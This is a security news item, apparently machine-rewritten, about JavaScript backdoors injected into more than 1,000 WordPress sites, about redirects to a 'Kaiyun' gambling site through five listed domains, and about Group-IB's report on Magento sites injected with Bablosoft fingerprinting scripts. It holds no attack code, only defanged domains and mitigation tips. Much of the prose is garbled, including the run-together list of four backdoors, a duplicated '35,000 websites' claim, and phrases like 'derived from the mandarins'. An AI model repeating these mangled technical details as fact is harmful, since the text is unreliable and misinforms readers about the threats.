Over 1,000 websites with WordPress are infected with third-party JavaScript code injecting four separate backdoors.
“Creating four backdoors makes it easier for attackers with multiple re-entries if one is detected and deleted,” C/Side researcher Himanshu Anand said in an analysis Wednesday.
Malicious JavaScript code is known to be provided via cdn.csyndication[.]com. At the time of writing, as many as 908 websites contain references to the domain in question.
The functions of the four backdoors are explained below –
Backdoor 1, which uploads and installs a fake plugin named “Ultra SEO Processor”, is used to run command backdoor 2 issued by an attacker. This injects malicious JavaScript into WP-Config.php backdoor 3. Run a remote command and get another payload from GSocket[.]I’m likely to open an inverse shell
To mitigate the risk posed by attacks, users are recommended to remove rogue SSH keys, rotate WordPress administrative credentials, and monitor system logs to monitor suspicious activity.
As cybersecurity companies detail another malware campaign, development occurred as more than 35,000 websites using malicious JavaScript detailed over 35,000 websites redirecting site visitors to a Chinese gambling platform to “fully hijack a user’s browser window.”
“Attacks appear to be targeted or derived from the mandarins in a common area. The final landing page presents gambling content under the “Kaiyun” brand.
Redirects occur via JavaScript hosted in five different domains. This acts as the loader of the main payload responsible for performing the redirect –
mlbetjs[.]com ptfafajs[.]com zuizhongjs[.]com jbwzzzjs[.]com jpbkte[.]com
The findings follow a new report from Group-IB, followed by a new report about a threat actor called Screamedjungle that injects Bablosoft JS with JavaScript code into a compromised Magento website, and collects visitor fingerprints. Over 115 e-commerce sites are believed to have been affected so far.
The injected script is “part of the Bablosoft Browser Automation Studio (BAS) suite,” the Singapore company said, adding that it “contains several other features to collect information about the systems and browsers of users accessing compromised websites.”
The attacker is said to be exploiting a known vulnerability affecting the vulnerable Magento version (CVE-2024-34102 aka CVE-2024-20720) to violate the website. The financially motivated threat actor was first discovered in Wild in late May 2024.
“Browser fingerprinting is a powerful technique commonly used on websites to track user activity and take marketing strategies,” Group-IB said. “However, this information is also being utilized by cybercriminals to mimic legitimate user behavior, circumvent security measures and carry out fraudulent activities.”
Source link
